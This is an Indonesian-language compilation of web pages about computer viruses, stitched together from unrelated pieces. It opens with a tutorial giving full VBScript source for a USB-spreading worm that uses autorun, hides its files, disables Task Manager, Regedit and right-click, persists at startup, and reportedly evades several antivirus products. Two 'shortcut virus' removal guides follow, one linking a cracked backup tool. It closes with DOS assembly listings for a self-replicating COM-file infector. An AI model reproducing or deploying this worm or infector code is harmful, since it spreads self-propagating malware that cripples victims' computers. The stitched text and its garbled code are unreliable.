bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host. Sesua janji saya, kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama Kalong.VBS. Sekarang buka Notepad-nya. Copy kode berikut ://Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus// on error resume next //Dim kata-kata berikut ini// dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd //Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information// isi = [autorun] & vbcrlf & shellexecute=wscript.exe k4l0n6.dll.vbs set fs = createobject(Scripting.FileSystemObject) set mf = fs.getfile(Wscript.ScriptFullname) dim text,size size = mf.size check = mf.drive.drivetype set text = mf.openastextstream(1,-2) do while not text.atendofstream rekur = rekur & text.readline rekur = rekur & vbcrlf loop do //Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows) Set windowpath = fs.getspecialfolder(0) set tf = fs.getfile(windowpath & \batch- k4l0n6.dll.vbs ) tf.attributes = 32 set tf=fs.createtextfile(windowpath & \batch- k4l0n6.dll.vbs,2,true) tf.write rekursif tf.close set tf = fs.getfile(windowpath & \batch- k4l0n6.dll.vbs ) tf.attributes = 39 //Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok// Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket for each flashdrive in fs.drives //Cek Drive// If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path A: then //Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\// set tf=fs.getfile(flashdrive.path &\k4l0n6.dll.vbs ) tf.attributes =32 set tf=fs.createtextfile(flashdrive.path &\k4l0n6.dll.vbs ,2,true) tf.write rekursif tf.close set tf=fs.getfile(flashdrive.path &\k4l0n6.dll.vbs ) tf.attributes = 39 //Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)// set tf =fs.getfile(flashdrive.path &\autorun.inf) tf.attributes = 32 set tf=fs.createtextfile(flashdrive.path &\autorun.inf,2,true) tf.write isi tf.close set tf = fs.getfile(flashdrive.path &\autorun.inf) tf.attributes=39 end if next //Manipulasi Registry// set kalong = createobject(WScript.Shell) //Manip - Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY// kalong.regwrite HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title, THE KALONG v.s. ZAY //Manip Set agar file hidden tidak ditampilkan di Explorer//

kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hi dden, 0, REG_DWORD //Manip Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager// kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind, 1, REG_DWORD kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOpt ions, 1, REG_DWORD kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun, 1, REG_DWORD kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistr yTools, 1, REG_DWORD kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskM gr, 1, REG_DWORD //Manip Disable klik kanan// kalong.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewCont extMenu, 1, REG_DWORD //Manip - Munculkan Pesan Setiap Windows Startup// kalong.regwrite HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaptio n, Worm Kalong. Variant from Rangga-Zay, dont panic all data are safe. //Manip Aktif setiap Windows Startup// kalong.regwrite HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir, windowpath & \batch- k4l0n6.dll.vbs //Manip Ubah RegisteredOwner dan Organization// kalong.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization, The Batrix kalong.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner,Kalong //Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan// if check 1 then Wscript.sleep 200000 end if loop while check 1 set sd = createobject(Wscript.shell) sd.run windowpath & \explorer.exe /e,/select, & Wscript.ScriptFullname Akhir dari Kode

Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja. He..heVirus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay. Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.

CARA 1 MENGHAPUS VIRUS SHORTCUT:Berikut 8 langkah praktis untuk mendepak virus yang mampu mengubah folder yang ada di dalam USB flash disk menjadi shortcut tersebut: 1. Nonaktifkan System Restore untuk sementara selama proses pembersihan. 2. Putuskan komputer yang akan dibersihkan dari jaringan.

3. Matikan proses virus yang aktif di memori dengan menggunakan tools Ice Sword. Setelah tools tersebut terinstal, pilih file yang mempunyai icon Microsoft Visual Basic Project kemudian klik Terminate Process. Silahkan download tools tersebut di http://icesword.en.softonic.com/ 4. Hapus registri yang sudah dibuat oleh virus dengan cara: -. Klik menu [Start] -. Klik [Run] -. Ketik REGEDIT.exe, kemudian klik tombol [OK] -. Pada aplikasi Registry Editor, telusuri key [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] -. Kemudian hapus key yang mempunyai data [C:\Document and Settings\%user%]. 5. Disable autoplay/autorun Windows. Copy script di bawah ini pada program notepad kemudian simpan dengan nama REPAIR.INF, install file tersebut dengan cara: Klik kanan REPAIR.INF > INSTALL [Version] Signature=$Chicago$ Provider=Vaksincom [DefaultInstall] AddReg=UnhookRegKey DelReg=del [UnhookRegKey] HKLM, Software\CLASSES\batfile\shell\open\command,,,"%1 %* HKLM, Software\CLASSES\comfile\shell\open\command,,,"%1 %* HKLM, Software\CLASSES\exefile\shell\open\command,,,"%1 %* HKLM, Software\CLASSES\piffile\shell\open\command,,,"%1 %* HKLM, Software\CLASSES\regfile\shell\open\command,,,regedit.exe %1 HKLM, Software\CLASSES\scrfile\shell\open\command,,,"%1 %* HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoDriveTypeAutoRun,0x000000ff,255 HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer, NoDriveTypeAutoRun,0x000000ff,255 6. Hapus File induk dan file duplikat yang dibuat oleh virus termasuk di flash disk. Untuk mempercepat proses pencarian, Anda dapat menggunakan fungsi Search. Sebelum melakukan pencarian sebaiknya tampilkan semua file yang tersembunyi dengan mengubah pada setting Folder Options. Jangan sampai terjadi kesalahan pada saat menghapus file induk maupun file duplikat yang telah dibuat oleh virus. Lalu hapus file induk virus yang mempunyai ciri-ciri:

-. Icon Microsoft Visual Basic Project. -. Ukuran File 128 KB (untuk varian lain akan mempunyai ukuran yang bervariasi). -. Ekstesi file .EXE atau .SCR. -. Type file Application atau Screen Saver. Kemudian hapus File duplikat shortcut yang mempunyai ciri-ciri: >. Icon Folder atau icon >. Ekstensi .LNK >. Type File Shortcut >. Ukuran file 1 KB Hapus juga file yang .DLL (contoh: ert.dll) dan file Autorun.inf di flash disk atau folder yang di-share. Sementara untuk menghindari virus tersebut aktif kembali, hapus file induk yang mempunyai ekstensi EXE atau SCR terlebih dahulu baru kemudian hapus file Shortcut (.LNK). 7. Tampilkan kembali folder yang telah disembunyikan oleh virus. Untuk mempercepat proses tersebut, silahkan download tools UnHide File and Folder di http://www.flashshare.com/bfu/download.html. Setelah diinstall, pilih direktori [C:\Documents and settings] dan folder yang ada di flash disk dengan cara menggeser ke kolom yang sudah tersedia. Pada menu [Attributes] kosongkan semua pilihan yang ada, kemudian klik tombol [Change Attributes]. 8. Install security patch Microsoft Windows Shell shortcut handling remote code execution vulnerability-MS10-046. Silakan download security patch tersebut di http://www.microsoft.com/technet/security/Bulletin/MS10-046.mspx Seperti biasa, untuk pembersihan secara optimal dan menecegah infeksi ulang, sebaiknya install dan scan dengan antivirus yang up-to-date dan sudah dapat mendeteksi virus ini dengan baik. Original source: vaksin[dot]com & detikinet[dot]com

CARA 2 MENGHAPUS VIRUS SHORTCUT:Ciri-ciri virus shortcut : Pertama-tama, setelah menginfeksi komputer, dia akan membuat file induk database.mdb di My Documents Yang kedua adalah virus tersebut akan membuat file autorun.inf di setiap drive harddisk, flash disk, dan folder tanpa kecuali. Yang ketiga adalah dia akan membuat file Thumb.db (hati-hati, perhatikan bahwa file ini tanpa huruf s sedangkan thumbnail cache yang asli di komputer memiliki tambahan huruf s alias thumbs.db) di setiap folder Untuk memancing korban, dia akan membuat file Microsoft.lnk dan New Harry Potter and.lnk di setiap folder yang jika dieksekusi akan langsung mengaktifkan virus tersebut. Seperti halnya virus-virus lokal lainnya, dia akan membuat duplikat setiap folder namun kali ini bukan dengan ekstensi .exe melainkan extensi .ink alias shortcut.

Pada task manager terdapat proses services wscript.exe yang sedang berjalan. Dalam kondisi normal, tidak ada proses seperti ini. Langkah-langkah menghapus virus shortcut : 1. Matikan System Restore. Sejak dulu saya selalu mematikan system restore segera setelah proses instalasi windows. Untuk keperluan backup dan imaging system, saya lebih memilih menggunakan third party seperti acronis ataupun Norton Ghost (baca dan dowload : Norton Ghost 15.0.0.35659 (2010) Full Serial Crack) 2. Matikan proses virus wsrcipt.exe (C:\WINDOWS\System32\wscript.exe) Bisa menggunakan Process Explorer atau misc. tool pada HijackThis (baca dan download : HijackThis 2.0.2 ). 3. Hapus file virus database.mdb di My Documents.. 4. Hapus file duplikat virus.. Untuk proses penghapusan, anda bisa menggunakan fasilitas search pada Windows.. Pada More advanced options, pastikan option Search system folders dan Search hidden files and folders keduanya telah dicentang. Search file dengan nama autorun.inf ukurannya 8 KB Search file dengan nama Thumb.db ukurannya 8 KB Search file dengan ekstensi .lnk.lnk ukurannya 1 KB Hapus semua file yang ditemukan.. Untuk lebih memudahkan proses pencarian yang sekaligus menghapus file yang ditemukan, anda bisa menggunakan software UTool, sebuah freeware yang dapat anda download secara gratis. Program ini akan secara otomatis mencari dan kemudian menghapus file-file yang diinginkan (lihat gambar). 5. Hapus registry Autorun yang dibuat virus dengan menggunakan HijackThis.. Cari di bagian HKCU\..\Run: yang berhubungan dengan file database.mdb (pada gambar namun file database.mdb udah saya hapus) regedit_run Untuk lebih memantabkan proses pencegahan dan melindungi komputer kita dari serangan virus lokal yang sangat memusingkan ini, anda dapat melakukan hal-hal berikut: 1. Setelah proses instalasi windows, segera matikan system restore. 2. Install software third party misal Tweak UI atau Magic Tweak untuk mendisable autorun dan mencegah teraktivasinya file-file .inf. Mungkin pada Windows XP Professional, proses menon-aktifkan autorun bisa dilakukan dengan mudah, namun pada versi Win XP Home, anda memerlukan software ini. Tambahan informasi, program MagicTweak selain berfungsi menon-aktifkan autorn dapat juga digunakan untuk mencegah dijalankannya file-file .inf File autorun.inf yang biasanya merupakan awal dari berjangkitnya virus akan secara otomatis diubah menjadi murni file txt alias notepad oleh program ini dan dia tidak lagi bisa dieksekusi. Ini sangat membantu jika memang secara

tidak sengaja kita mengaktifkan atau mengeksekusi autorun.inf meski proses autorun sudah didisable untuk semua drive (termasuk flash disk). 3. Setelah semua proses instalasi windows, driver, program, dan lain-lain telah selesai, segera backup image system anda menggunakan software macam Acronis True Image atau Norton Ghost, sehingga jika nanti ada masalah yang tidak dapat anda selesaikan dengan mudah, anda dapat merestoreasi backup system tersebut. 4. Jika perlu, instal juga Deep Freeze apabila komputer anda digunakan oleh banyak orang, sehingga settingan komputer tidak akan berubah-ubah. 5. Update info: Ciri-ciri virus terdapatnya virus shortcut pada flashdisk dapat diketahui dengan perbedaan icon flashdisk tersebut yang biasanya berbentuk seperti icon drive menjadi berubah seperti icon folder. Jika menemui icon seperti ini, berarti dalam flashdisk tersebut terdapat virus. Gunakan explorer dan buka flashdisk lewat explorer (jangan klik 2x dari my computer) dan hapus file autorun dan file2 tersangka virus lainnya secara manual dengan menekan shift + DEL (supaya tidak tersangkut di recycle bin). Rata-rata virus lokal dapat dicegah dengan cara manual seperti ini asalkan OPSI DISABLE AUTORUN pada windows dan/atau MagicTweak telah diaktifkan, dan juga OPSI DISABLE .INF FILE pada MagicTweak telah diaktifkan. Nah, itu mungkin sedikit tips cara menghapus virus shortcut dan smoga komputer kamu setelah hapus virus shortcut jadi bebas deh dari virus shortcut.

PEMPROGRAMAN VIRUS KOMPUTER4. 1. Cara Kerja Virus Komputer Cara kerja Virus Komputer pada umumnya adalah menyebarkan dirinya dengan cara antara lain menularkan file-file executable atau file-file yang bisa dijalankan langsung dari DOS Command line . Untuk memperjelas mekanisme penyebaran di ilustrasikan pada gambar dibawah ini :

Gambar 4.1. Mekanisme Penularan Sudah jadi sifat virus jika dia dijalankan, maka ia menulari program aplikasi yang lain, yang di maksud menulari adalah menyalin dirinya atau program virus tersebut ke program aplikasi lainnya, jika dalm hal ini yang tertular adalah program Aplikasi 1, maka apabila program aplikasi 1 tersebut dijalankan, maka program aplikasi 1 yang sudah serinfeksi virus itu akan menularkan virus pada program aplikasi yang ke 2 , maka baik program aplikasi 1 maupun 2, sudah merupakan program pemikul bagi virus itu sendiri, yang akan menularkan seluruh program aplikasi yang ada.

Agar bisa bertindak sebagai virus komputer, sebuah program harus mempunyai 5 buah kemampuan yang merupakan prinsip dari virus komputer. Kelima kemampuan itu adalah : 1. 2. 3. 4. 5. 6. Kemampuan mendapatkan informasi Kemampuan memeriksa program Kemampuan menggandakan diri / menularkan Kemampuan mengadakan manipulasi Kemampuan menyembunyikan diri sendiri Satu persatu kemampuan itu akan dijelaskan pada subbab selanjutnya

4. 1.1. Kemampuan mendapatkan Informasi Pada Virus Komputer kemampuan untuk mendapatkan informasi sangat penting, terutama informasi mengenai file yang akan diinfeksi, Virus Komputer biasa nya tidak menulari 1 program saja, tapi sekumpulan program, contohnya File-file EXE, file-file COM, atau kedua-duanya, virus harus mendapatkan informasi tentang file tersebut pada directory, hal-hal mengenai informasi pada file yang perlu diketahui antara lain : 1. Apakah Extensi File tersebut ( COM,EXE, BAT) 2. Apa Atribut file ( Hidden, Readonly, Archive) 3. Besar File Yang akan Di infeksi Informasi tersebut sangat bermanfaat bagi virus, dimana informasi mengenai Extension file berguna untuk virus yang menyerang file-file tertentu contohnya virus yang menyerang file EXE, virus tersebut harus mencari file-file EXE yang akan ditulari. Informasi attribut berguna untuk memberikan pilihan pada virus apakah dapat menyerang file dengan attribut Readonly, Hidden ataukan virus harus mengeset attribut file-file tersebut menjadi Normal, sehingga virus dapat menulari. Informasi tentang ukuran file berguna untuk operasi matematis yang akan menghitung berapa besar file yang sudah tertular, dimana Besar_file_terinfeksi = file_asli + Virus_size Fungsi ini terutama dipakai oleh virus Non OverWriting. Dibawah ini cuplikan metode virus untuk mendapatkan informasi tentang File :Start : mov dx,offset File_to_infect ; cari seluruh file Mov ah,4Eh Mov cx, 3 ; Attribut File ; cari host file

int 21h ; Dos Intrupt cmp ax,12h ; Ada file lagi je exit file_to_infect db *.COM ; File yang akan diinfeksi ends start ; akhir kode Virus ; kalau tidak ada exit

Listing 4.1. Search First File

Dimana Dx menuju ke alamat yang berisi nama file yang akan di infeksi, sedangkan disini di gunakan DOS Interupt 21H dengan Service ah, 4EH yang berguna untuk mencari file pertama yang cocok dengan DX ( Find First Matching File), dan mendapat kan informasi tentang file yang berada di dalam directory, biasanya fungsi 4Eh ini selalu berpasangan dengan 4Fh, yaitu fungsi untuk mencari file berikutnya yang cocok ( Find Next Maching File), sedangkan nilai CX,3 digunakan untuk mengecek attribut dari file, apakah Hidden, ReadOnly, virus dapt mengeset kembali attribut file menjadi normal, sehingga virus dapat menginfeksi file tersebut. 4. 1. 2. Kemampuan Untuk Memeriksa Program Kemampuan untuk memeriksa program sangat penting bagi Virus Komputer , karena untuk mengetahui apakah file target sudah tertular atau belum, ini sangat penting karena virus tidak akan menularkan dirinya berkali-kali pada file yang sama, selain untuk mempercepat proses penularan juga untuk menjaga agar file korban tidak rusak, karena apabila penularan dilakukan berulang-ulang pada file yang sama, CRC dari file tersebut akan kacau dan menyebabkan file yang tertular tidak jalan, biasaanya file rusak tersebut akan mengeluarkan pesan Divide Over Flow, atau Error in Exe File, selain itu file yang berkali-kali diifeksi akan bertambah besar, dan akan mencurigakan pemakai komputer. Seperti digambarkan dalam flowchart berikut ini :

Gambar 4.2. Memeriksa Program Berikut ini contoh listing dari kemampuan untuk memeriksa fileMov ah, 3fh ; Baca file Mov cx, 3 ; baca 3 byte Mov dx,3_byte ; simpan pada buffer Add dx,si ; Nama file Int 21h ; Dos intrupt Cmp a,3 ; Cek 3 byte tadi Jnz cari_lagi ; Jika sudah tertular exit Jmp Infect ; kalau belum , infect_file 3_byte equ $ ;data 3 byte pertama dari file asli ;yang belum tertular infect_file : ; bagian penginfeksian ; rutin infeksi int 20h ; Dos Exit function nop ; No Operation

Listing 4.2 . Periksa File Pada rutin diatas dapat dilihat bagai mana Virus Komputer memeriksa file korbannya, untuk memberikan identitas file mana yang sudah terinfeksi maupun yang belum, karena dengan memeriksa file korban, umumnya 3 byte pertama yang menandakan file tersebut

sudah tertular / belum, 3 byte pertama tersebut umumnya intruksi JMP : offset (Untuk file COM) , kode MZ pada header file EXE dan PE untuk File Aplikasi Windows Rutin ini sangat penting untuk menghindari penularan berkali-kali pada file korban, juga untuk menpercepat penularan. Rutin ini dipakai oleh 90 % virus komputer untuk menularkan diri. 4. 1. 3. Kemampuan untuk menggandakan diri / Replicating kemampuan ini merupakan inti utama dari Virus Komputer , karena virus komputer memang diprogram untuk menularkan, dan memperbanyak dirinya. Tugas dari rutin replicating ini adalah menyebarkan virus keseluruh system yang ditularinya, tugas dari rutin ini sangat berat karena rutin tersebut harus mampu menyebarkan virus dengan cepat dan tidak diketahui oleh pemakai komputer, selain itu rutin replicator harus dapat menjaga agar file yang ditularinnya tidak rusak ( Rutin untuk Virus Appending / NonOverwriting ), dan dapat berjalan sebagaimana mestinnya. Cara kerja rutin replicator pada file COM lebih sederhana dari file EXE, karena struktur program EXE yang tidak terbatas besarnya yaitu ( sebesar memory di komputer ), sedangkan file COM hanya dibatasi sampai 64 Kb ( Base memory ). Rutin replikator pada file COM akan menditeksi dan mengcopy byte pertama dari file yang akan ditularinya, kedalam suatu daerah di memory, rutin tersebut dipindahkan kedalam daerah lain dalam file.

File bersih

program Virus

Pada diagram diatas P1 adalah bagian pertama dari file, P2 adalah bagian kedua dari file korban. P1 harus sama besar dengan V1 (rutin virus) , rutin virus akan menyimpan P1 dan mengcopynya pada bagian akhir dari file.

Setelah itu virus akan mengcopykan bagian pertama dari dirinya (V1) ke bagian awal file korban. Dimana V1 berisi instruksi JMP:V2, yaitu instruksi untuk memanggil badan

Virus yang ada di belakang file korban. Kemudian virus akan mengcopykan bagian kedunya (V2) yang merupakan badan virus ke akhir file yang ditulari, V2 ini biasanya berisi rutin-rutin lain seperti rutin untuk

pengaman, rutin untuk melakukan aksi tertentu dan lain-lain. Rutin tersebut dapat dilihat dibawah ini :

Dalam program dapat diambil contoh 44-Virus.Com , yang merupakan virus sepanjang 44 byte, dengan cara kerja Overwriting file Com yang ada dalam suatu directory sepanjang badan Virus itu sendiri yaitu 44 Byte, virus ini masih sangat sederhana dan belum mempunyai rutin-rutin pengaman, maupun kemampuan untuk memeriksa program, ataupun rutin untuk aksi-aksi tertentu , dalam contoh dibawah ini virus hanya mempunyai kemampuan untuk menulari file Com. Namun demikian dapat kita lihat bagaimana virus akan berkembang dengan cara menggandakan dirinya dalam program Com. Berikut ini listing dari 44-Virus.Asm :

virus segment org 100h ; file COM assume cs:virus len equ offset last-100h ;Panjang virus = Akhir program awal program start : mov ah,04eh ; Cari file dengan kategori file COM xor cx,cx ; cx 0, = hanya file dengan atrribut Normal lea dx,com_mask ; Nama file COM masukan ke register DX int 21h ; Dos Intrupt open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis mov dx,9eh Int 21h Infect : mov cx,len ; cx diisi panjang badan virus lea dx,start ; Masukan header Virus V1 pada DX Mov ah,40h ; Tulis badan virus dalam file korban Int 21h ; Dos Intrupt Next : mov ah,3eh ; Tutup file korban int 21h mov ah,4fh ; Cari file korban lagi int 21h jnb open_file ; Apa sudah semua file Com ? kalau belum jmp ke Open_file ; Kalau sudah semua terinfeksi Exit com_mask: db *.COM,0 ; File dengan ekstensi Com last : db 090h ; Akhir badan virus V2 virus ends end start

Listing 4.3. Replicating / Penggandaan 4. 1. 4. Kemampuan Mengadakan Manipulasi Kemampuan untuk mengadakan manipulasi sangat penting dilakukan oleh virus, karena bagian ini sebetulnya yang membuat virus komputer menarik, dan mempunyai seni dalam pembuatannya. Bagian manipulasi atau rutin manipulasi ini banyak macamnya, dan fungsinya, suatu virus dapat mempunyai salah satu diantara rutin-rutin manipulasi ini maupun gabungan antara rutin-rutin manipulasi tersebut. yang pasti, makin banyak rutin manipulasi yang dipakai oleh virus, maka akan makin besar ukuran virus yang dibuat. Diantara rutin-rutin manipulasi yang ada, yang sering digunakan adalah : 1. Menampilkan tulisan / kata-kata / gambar 2. Membunyikan port speaker 3. Time bomb / logic Bomb 4.1.4.1. Menampilkan Tulisan / gambar Rutin ini yang paling banyak dipakai oleh pembuat Virus Komputer , karena rutin ini selain untuk kepopularitas virus maupun pembuatnya, juga akan membuat virusnya mudah dikenal oleh para pemakai komputer, selain itu rutin ini membutuhkan suatu kreatifitas tinggi dan jiwa seni dari pembuatnya yang akan membuat virus ini akan menarik. Listing program dibawah ini akan memberikan contoh pembuatan rutin ini.

virus segment org 100h assume cs:virus len equ offset last-100h ; Panjang virus = Akhir program awal program start : jmp mulai msg db Modification of 44 Virus ,13,10 db 2000,iwing[indovirus] ,13,10 db For Educational Only -$,13,10 mulai : mov ah,09 ; Dos service 09h = Cetak String lea dx,msg ; dx berisi pesan yang akan dicetak int 21h ; Dos intrupt go : mov ah,04eh ; Cari file dengan kategori file COM xor cx,cx ; cx 0, = hanya file dengan atrribut Normal

lea dx,com_mask ; Nama file COM masukan ke register DX int 21h ; Dos Intrupt open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis mov dx,9eh Int 21h infect : mov cx,len ; cx diisi panjang badan virus lea dx,start ; Masukan header Virus V1 pada DX mov ah,40h ; Tulis badan virus dalam file korban Int 21h ; Dos Intrupt Next : mov ah,3eh ; Tutup file korban int 21h mov ah,4fh ; Cari file korban lagi int 21h jnb open_file ; Apa sudah semua file Com ?,kalau belum jmp ke Open_file ; Kalau sudah semua terinfeksi Exit com_mask: db *.COM,0 ; File dengan ekstensi Com last : int 20h ; Akhir badan virus V2 virus ends end start

Listing. 4.4. Rutin Cetak String Pada listing program virus diatas dapat dilihat, modifikasi dari virus 44 byte Dengan tambahan rutin untuk menampilkan string : Modification of 44 Virus 2000,iwing[indovirus] -For Educational Only setiap kali penularan. Disini dapat dilihat rutin yang menampilkan pesan tadi yaitu mulai : mov ah,09 ; Dos service 09h = Cetak String lea dx,msg ; dx berisi pesan yang akan dicetak int 21h ; Dos intrupt